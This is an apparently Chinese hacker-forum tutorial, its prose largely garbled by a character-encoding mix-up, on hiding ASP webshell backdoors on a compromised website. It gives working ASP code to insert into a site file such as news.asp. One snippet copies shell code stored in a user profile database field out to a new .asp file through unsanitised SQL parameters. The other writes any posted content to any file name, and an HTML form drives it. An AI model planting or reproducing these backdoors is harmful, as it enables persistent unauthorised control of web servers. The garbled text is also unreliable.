¤Þ¨¥¡G¦n长时间¤F¡A从刚开©lªº¯¸点ºÞ²z¾¹¨ì现¦b¬y¦æªº¤L´Úasp¦Z门¡A¬Û«H¤j¦hÊIºÞ³£¯à说¥X这¨Ç经¨åwebshellªº¦W¦r¡A¦p®ü¬v¡B¦Ñ§L¡B蓝«Ìµ¥,¤]¬Û«H¤j¦h数ªºÊIºÞ学会¤F关键¦rªº·j¯Á¤èªk来·j¯Á这¨Ç¤ì马¡A当µM现¦bªº时间¦pªG¦A¶H隐ÂæZ门´N­n讲¨Ç§Þ¥©°Õ¡A«U话说ªº¦n¡§¦ò°ª¤@¤Ø¡A§Ú°ª¤@¤V¡¨¡C

§Ú¤£§_认n¦­«eªº¨º个§âasp¤ì马写¨ì图¤ù¤å¥ó¤¤¤£¥¢为¤@Ïú¦nªº¤èªk¡A¨ä实¤£仅¥i¥H写¨ì图¤ù°Õ 写¨ìmp3¤å¥ó¨½写¨ìdoc¤å¥ó¨½³£¬O¥i¥Hªº°Õ
copy ¤å¥ó¦W/参数 + ¤å¥ó¦W/参数 ¥Í¦¨¤å¥ó¦W
这样ªº¤èªk¥i¥H«Ü灵¬¡ªº运¥Î来达¨ì隐Âäå¥óªº¥Øªº¡A¨ãÊ^ªº参数´N¬O/a¥Hacsic码¤è¦¡¡A/b¤G进¨î¤è¦¡¡A´N¤£罗¶Û这¨Ç¤F¡A¦Ü¤_¦p¦ó¤W传webshell,¤°¤\¬Owebshell¤]¤£属¤_¥»¤åªº讨论­S围¡C¤µ¤Ñ­n讲ªº¬O¦p¦ó§â¦Z门©ñ¨ì¦Z缀.mdbªº数Õu库¤¤¡A«e´£¬O¦b§Ú们®³¨ì

¤@个webshell¤§¦Z...

§Ú们©Òª¾¹Dªº¡A«Ü¦h¯¸点¦b¥Î户ª`册ªº时­Ô­n让¶ñ¦n¦h东¦è¨Ò¦p¡G
¥Î户¦W¡B±K码¡BQQ¡B邮½c¡B个¤H简¤¶¡B电话¡B联¨t¤è¦¡¡B¦í§}¤@类ªº
¦Ó对应¨ì数Õu库¤¤¤]³£会¦³¬Û应ªºªí ¦r¬q ­È
§Ú¤µ¤Ñ­n°µªº´N¬O §Úª`册¤@个¥Î户¦b §Úªº个¤H简¤¶ªº¦a¤è¤W写¤Jshell¥N码¡AµM¦Z­×§ï¥L¯¸点¤Wªº¤@个¤å¥ó¡A¨Ï¥Îªº时­ÔàD发这个¤å¥ó¡A´N§â§Ú个¤H简历¤¤ªºshell¥N码¡A备¥÷¨ì当«e¥Ø录¤U
废话¤Ö说¤F ¤j®a¬Ý¥N码
<%
if request("action")="firefox" then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
rs.open sql,conn,1,3
if not rs.eof then
content=rs(bname)
else
response.write "Nothing"
end if
set fso=Server.CreateObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
end if
%>



将¤W边ªº¥N码¥[¨ì¯¸点ªº¤@个¤å¥ó¤¤ ¦pnews.asp

®ÚÕu§Ú们¤F¸Ñªº«H®§ ¦b¨ä¯¸点ª`册¦Z ¤U载数Õu库¬Ý结ÌÛ

§Úª`册ªºfirefox¦W¦r¬O¦b userªí ¨äid­È为119 ¥Î¤_¦s©ñ§Úª`册简历ªºªí¦r¬q为jl

¨º¤\¦b¨Ï¥Îªº时­Ô§Ú们

news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119

´N¥i¥H¦bnews.asp¬Û¦P¥Ø录¤U写¤J¤@个¦W为 firefox.aspªºwebshell

¥H¤W¥i¥H说¬OÉE¤d隐Âäèªk¤¤ªº¤@Ïú ¤U边¦A说¥t¥~¤@Ïú§ó¤è«Kªº隐Âäèªk

这个¤èªk´N©Mmdb¦Z缀无关¨t¤F

¦P样§Ú们还¬O­×§ïnews.asp 将¥H¤U¥N码´¡¤J¨ì对¤ènews.asp¤¤
<%
if request("action")="firefox" then
n=request.form("n")
c=request.form("c")
set fso=Server.CreateObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
end if
%>



这¬q¥N码¬Û对简单¨Ç ºâ¬O¤@个¤ì马ªºªA务ºÝ§a

¨Ï¥Îªº时­Ô¥H这¬q¥N码°t¦X
<HTML><HEAD>
<META http-equiv=Content-Type c>
<title>F.s.t¤õª°§Þ术联·ù[www.wrsky.com]</title>
<FORM action="http://localhost/config.asp?action=firefox" method=post>
<META c name=GENERATOR></HEAD>
<BODY>Name:<INPUT size=50
name=n width="32"><BR><BR>Shell:<TEXTAREA name=c rows=10 cols=80

width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>



将¥H¤W¥N码¤¤ªº

http://localhost/config.asp?action=firefox



´À换¦¨§AªºªA务ºÝ¦a§}
µM¦Z«O¦s为¥»¦aªº.htm¤å¥ó

¥»¦a¥´开¦Z©w义­n¥Í¦¨ªº¤å¥ó¦W ¤å¥ó内®e 远µ{´£¥æ ok ¤S¬O¤@Ïú¯d¦Z门ªº¤èªk

¦¹¤å没¦³¤Ó°ªªº§Þ术§t¶q §Þ术¥æ¬y¥i¥H¨ìwww.wrsky.com

还±æ¦U为¤j¤û¦h¦h´£携